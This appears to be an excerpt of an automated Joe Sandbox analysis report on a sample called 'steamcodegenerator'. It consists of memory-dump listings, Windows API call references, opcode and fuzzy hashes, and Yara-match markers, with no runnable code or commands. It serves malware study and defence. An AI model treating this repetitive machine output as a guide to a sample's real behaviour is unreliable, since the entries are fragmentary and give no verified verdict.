                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue$InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 673564084-0
                                                                        • Opcode ID: 4c183c7ee8845e7f1e29b7170d50f5209d966a7f82c8ce190a7d309a0b29ac7e
                                                                        • Instruction ID: c15c62143dae59d6a0a24b3340f01526ee64fd447d790cf5d6184777d5a0e35b
                                                                        • Opcode Fuzzy Hash: 4c183c7ee8845e7f1e29b7170d50f5209d966a7f82c8ce190a7d309a0b29ac7e
                                                                        • Instruction Fuzzy Hash: 5731C472A08682C6EB648B22E4523BA73B0FB45740F544134DA4EEB7A5DF3CE4548700
                                                                        APIs
                                                                          • Part of subcall function 00007FF66355A298: GetLastError.KERNEL32 ref: 00007FF66355A2A7
                                                                          • Part of subcall function 00007FF66355A298: FlsGetValue.KERNEL32 ref: 00007FF66355A2BC
                                                                          • Part of subcall function 00007FF66355A298: SetLastError.KERNEL32 ref: 00007FF66355A347
                                                                        • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF663564627,?,00000000,00000092,?,?,00000000,?,00007FF663556B25), ref: 00007FF663563ED6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystemValue
                                                                        • String ID:
                                                                        • API String ID: 3029459697-0
                                                                        • Opcode ID: 01ec781091376c7859fee142802df2496de0f58f2f8dfee6d425d5d006462899
                                                                        • Instruction ID: 31e15cc4571264136afc9c60ca99dcb511e4a8873a74e388b48ea001b498caa9
                                                                        • Opcode Fuzzy Hash: 01ec781091376c7859fee142802df2496de0f58f2f8dfee6d425d5d006462899
                                                                        • Instruction Fuzzy Hash: C511E167A08645CAEB158F16D8816BD7BB0FB81FA0F448135C62A9B3F0CE78D9D1C750
                                                                        APIs
                                                                          • Part of subcall function 00007FF66355A298: GetLastError.KERNEL32 ref: 00007FF66355A2A7
                                                                          • Part of subcall function 00007FF66355A298: FlsGetValue.KERNEL32 ref: 00007FF66355A2BC
                                                                          • Part of subcall function 00007FF66355A298: SetLastError.KERNEL32 ref: 00007FF66355A347
                                                                        • GetLocaleInfoW.KERNEL32(?,?,?,00007FF66356419A), ref: 00007FF663564427
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$InfoLocaleValue
                                                                        • String ID:
                                                                        • API String ID: 3796814847-0
                                                                        • Opcode ID: 5447dec9b86e6f2ea6977062d9d6cdf6f0dba6f956cb56fba477a354d03ee583
                                                                        • Instruction ID: 2217ffefd5ca119f3eb26ff587e72ec52c50f5c97bb060bbbb97ce13548a26ff
                                                                        • Opcode Fuzzy Hash: 5447dec9b86e6f2ea6977062d9d6cdf6f0dba6f956cb56fba477a354d03ee583
                                                                        • Instruction Fuzzy Hash: 8D117A72F18512C3E7748B27A05367E23B1EB45761F144231D66DAB7D4DE29D8818700
                                                                        APIs
                                                                          • Part of subcall function 00007FF66355A298: GetLastError.KERNEL32 ref: 00007FF66355A2A7
                                                                          • Part of subcall function 00007FF66355A298: FlsGetValue.KERNEL32 ref: 00007FF66355A2BC
                                                                          • Part of subcall function 00007FF66355A298: SetLastError.KERNEL32 ref: 00007FF66355A347
                                                                        • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6635645E3,?,00000000,00000092,?,?,00000000,?,00007FF663556B25), ref: 00007FF663563F86
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystemValue
                                                                        • String ID:
                                                                        • API String ID: 3029459697-0
                                                                        • Opcode ID: 34d94b69e6205fce2f74fcc9f7c432e85abed7b203d1d4e603842b48bd0e59d7
                                                                        • Instruction ID: 8b8fdddddd503d1efcccd98a721aeb267e9ee16b9f455bf8a7f4bfe31d532a90
                                                                        • Opcode Fuzzy Hash: 34d94b69e6205fce2f74fcc9f7c432e85abed7b203d1d4e603842b48bd0e59d7
                                                                        • Instruction Fuzzy Hash: B5019272E08282C6EB104B17E8417B9B6B5EB51BA4F459232E6299B3E5DF7D94818700
                                                                        APIs
                                                                        • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF66355B7C7,?,?,?,?,?,?,?,?,00000000,00007FF663563488), ref: 00007FF66355B3C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: EnumLocalesSystem
                                                                        • String ID:
                                                                        • API String ID: 2099609381-0
                                                                        • Opcode ID: cff3fbf4e0a8c1f2ed818e2cbe172fd1e753f0025c3aa3cb7564e8ccb7c4537e
                                                                        • Instruction ID: c3fcdfeb60b41d4026b0e4c3cd188970f2ddf1822389934ff9c5f16fc018522d
                                                                        • Opcode Fuzzy Hash: cff3fbf4e0a8c1f2ed818e2cbe172fd1e753f0025c3aa3cb7564e8ccb7c4537e
                                                                        • Instruction Fuzzy Hash: B7F03C72B08B45C3E704DB19F8921AA23B1FB99780F549035EA4DEB365CE3CE5518740
                                                                        APIs
                                                                        • GetLastError.KERNEL32 ref: 00007FF66355F0AD
                                                                          • Part of subcall function 00007FF663558A7C: HeapAlloc.KERNEL32(?,?,00000000,00007FF66355A472,?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000), ref: 00007FF663558AD1
                                                                          • Part of subcall function 00007FF663558AF4: HeapFree.KERNEL32(?,?,00007FF663557CF3,00007FF6635628CA,?,?,?,00007FF663562C47,?,?,00000000,00007FF663563185,?,?,?,00007FF6635630B7), ref: 00007FF663558B0A
                                                                          • Part of subcall function 00007FF663558AF4: GetLastError.KERNEL32(?,?,00007FF663557CF3,00007FF6635628CA,?,?,?,00007FF663562C47,?,?,00000000,00007FF663563185,?,?,?,00007FF6635630B7), ref: 00007FF663558B14
                                                                          • Part of subcall function 00007FF66356641C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF66356644F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 916656526-0
                                                                        • Opcode ID: 3010b15ffcd90dc3c5e11d2ab062aefea6c4980bf83277aeeb3b0d4140d9f5ca
                                                                        • Instruction ID: 0bd24aae8db559960410b3980dc5355edb5d7daf9a982c6569c3d250bf1966f9
                                                                        • Opcode Fuzzy Hash: 3010b15ffcd90dc3c5e11d2ab062aefea6c4980bf83277aeeb3b0d4140d9f5ca
                                                                        • Instruction Fuzzy Hash: 9F41A431B19683C2FA609A26E9537BAA2F16F857A0F445535EE4DEF785EE3CF4018700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 54951025-0
                                                                        • Opcode ID: 6192be7a75bab5d09286e1907ab1535ba3ae8895899e3a88e776268eb0ac952a
                                                                        • Instruction ID: 9f2fd52a1f978f875cca2e43d208abe5a9f4f7e311be2286eb7017636e3148fa
                                                                        • Opcode Fuzzy Hash: 6192be7a75bab5d09286e1907ab1535ba3ae8895899e3a88e776268eb0ac952a
                                                                        • Instruction Fuzzy Hash: BCB09221E0BB46C2EA486B526C8321422B4BF58710F988038D14CAA320EE2C20A54701
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 958daa2a7498e9c4c0bde3b5edfdcbb4db2551368d5f8b4b3812ff5c91696324
                                                                        • Instruction ID: 6832a3cc0b25633fabd8739102348b4cd50d0f29daa53c2fc1513d6c4ea8771d
                                                                        • Opcode Fuzzy Hash: 958daa2a7498e9c4c0bde3b5edfdcbb4db2551368d5f8b4b3812ff5c91696324
                                                                        • Instruction Fuzzy Hash: E4E17730718A499BDB68DF78C8897EEB7E5FB98705F00422DD94AC3640DF35E9158B82
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                        • Instruction ID: e5128584c48c94cc193d20cc1e8ab6d0d5803c71700cd984fddd846d9f5e6c43
                                                                        • Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                        • Instruction Fuzzy Hash: 14D16E31608A088FDB59DF28C889AEAB7E1FF98310F14462DE88BC7555EF35E541CB42
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 4023145424-0
                                                                        • Opcode ID: 892cc1368fc14e84ac0355cad1cb2199747d5964f06703ea1faf111155d2dc5e
                                                                        • Instruction ID: 11a8eebbe1c8164429367d1ae29fe667ac77e80691331572c64d65a11170b572
                                                                        • Opcode Fuzzy Hash: 892cc1368fc14e84ac0355cad1cb2199747d5964f06703ea1faf111155d2dc5e
                                                                        • Instruction Fuzzy Hash: 96C18F76A087C2C5EB609B6194123BA67B0FB947A8F409035DE4EEBB95EE3CF545C700
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 544cec4f1fce81e20c5dc2a100fe106bde7a3ffc9f232f4ad8d78bd217c1061b
                                                                        • Instruction ID: f1c9ceb76c4231ec576588219ea0dab8064ec533796095be78048196278711e8
                                                                        • Opcode Fuzzy Hash: 544cec4f1fce81e20c5dc2a100fe106bde7a3ffc9f232f4ad8d78bd217c1061b
                                                                        • Instruction Fuzzy Hash: 24C1A032A08646C6EF68CF26C45167D2BB0EB45B68F144235CE1DABB95DF39FA41C740
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 75c19430ad9555f9ce9cd9ae4dcbb2ad4329e1d612567e8c7bcd07260438a972
                                                                        • Instruction ID: ebf9b5f8bd18b25826a7cb69aad7ccda38086e16fa65d626eb8fe3e6e437439d
                                                                        • Opcode Fuzzy Hash: 75c19430ad9555f9ce9cd9ae4dcbb2ad4329e1d612567e8c7bcd07260438a972
                                                                        • Instruction Fuzzy Hash: 01A14D31508A0C8FDB55EF68C889BEA77E5FBA8315F10426EE84AC7560EB34D644CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 1500699246-0
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629964375.0000022AF4E51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000022AF4E51000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e51000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 485612231-0
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                        • API String ID: 459529453-1866435925
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                        • String ID: bad locale name$false$true
                                                                        • API String ID: 4121308752-1062449267
                                                                        Similarity
                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 849930591-393685449
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,?,?,?,00007FF66355217D,?,?,?,?,00007FF663546424,?,?,?,00007FF663544660), ref: 00007FF66355B570
                                                                        • GetProcAddress.KERNEL32(?,?,?,?,00007FF66355217D,?,?,?,?,00007FF663546424,?,?,?,00007FF663544660), ref: 00007FF66355B57C
                                                                        Similarity
                                                                        • API ID: AddressFreeLibraryProc
                                                                        • String ID: api-ms-$ext-ms-
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: f$p$p
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF66354E53E,?,?,?,00007FF66354E230,?,?,?,00007FF66354AE11), ref: 00007FF66354E311
                                                                        • GetLastError.KERNEL32(?,?,?,00007FF66354E53E,?,?,?,00007FF66354E230,?,?,?,00007FF66354AE11), ref: 00007FF66354E31F
                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF66354E53E,?,?,?,00007FF66354E230,?,?,?,00007FF66354AE11), ref: 00007FF66354E349
                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF66354E53E,?,?,?,00007FF66354E230,?,?,?,00007FF66354AE11), ref: 00007FF66354E3B7
                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF66354E53E,?,?,?,00007FF66354E230,?,?,?,00007FF66354AE11), ref: 00007FF66354E3C3
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                        • String ID: api-ms-
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                        • String ID: invalid string position$@F
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: Value$ErrorLast
                                                                        • String ID:
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                        • String ID: CONOUT$
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: ByteCharMultiStringWide
                                                                        • String ID:
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                        • String ID:
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                        • String ID:
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                        • String ID: csm$csm$csm
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A41F
                                                                        • FlsSetValue.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A455
                                                                        • FlsSetValue.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A482
                                                                        • FlsSetValue.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A493
                                                                        • FlsSetValue.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A4A4
                                                                        • SetLastError.KERNEL32(?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000,00007FF663564803,?,?,?), ref: 00007FF66355A4BF
                                                                        Similarity
                                                                        • API ID: Value$ErrorLast
                                                                        • String ID:
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: 559c3951bd7f50195cdf89802e038081bfbf684ad2b4d9a1a4895f21a508b9c3
                                                                        • Instruction ID: 2cfcc7558cee5039fb7df93d22ef8aa4d8f98fc509c91ad98d8997341a4b09ef
                                                                        • Opcode Fuzzy Hash: 559c3951bd7f50195cdf89802e038081bfbf684ad2b4d9a1a4895f21a508b9c3
                                                                        • Instruction Fuzzy Hash: CAF04F71B09B86D2FA149B26A8563796330EF867A1F541635D5AE9B3F4CF3CE0458700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: fe0cf1a3f0e36931d8326c1fa5e43f68e623f8e1a1bba44f29af81dcaff10926
                                                                        • Instruction ID: c8d1adfe47460b3faea857520ce7878a3fa0e9429627573a3ba5850924cca2de
                                                                        • Opcode Fuzzy Hash: fe0cf1a3f0e36931d8326c1fa5e43f68e623f8e1a1bba44f29af81dcaff10926
                                                                        • Instruction Fuzzy Hash: 65B1B231A0E642C1EE6DAF16954227D63B4EF44B84F098435DE8DAF79BDE3CE4628340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                        • String ID:
                                                                        • API String ID: 1087005451-0
                                                                        • Opcode ID: e056fb752b00353b83d650d62f1f17403a3bacc8c07260b3d954efaf1a3d08a7
                                                                        • Instruction ID: c0622adb072e784821538721736d99ecd19cd323e621f45c6bededce172fd878
                                                                        • Opcode Fuzzy Hash: e056fb752b00353b83d650d62f1f17403a3bacc8c07260b3d954efaf1a3d08a7
                                                                        • Instruction Fuzzy Hash: 5D81C622F19B41C9FB14DBA5D4023EC3371AB557A8F448235DE5D6BB96EE38A1A1C340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _set_statfp
                                                                        • String ID:
                                                                        • API String ID: 1156100317-0
                                                                        • Opcode ID: c857c3327227c68747334663d00ca9331fa9479a74f52c20cdb4b2826f66a1e0
                                                                        • Instruction ID: 1a1d523273196000038be5a7f44f5ec8ac7e2ddc3fa7d8572b6dfbd5d9771c1e
                                                                        • Opcode Fuzzy Hash: c857c3327227c68747334663d00ca9331fa9479a74f52c20cdb4b2826f66a1e0
                                                                        • Instruction Fuzzy Hash: 1581B43291CA86C6F7338A39A45227A66B0AF55374F044331ED5EBB7A4DF3CB5818750
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
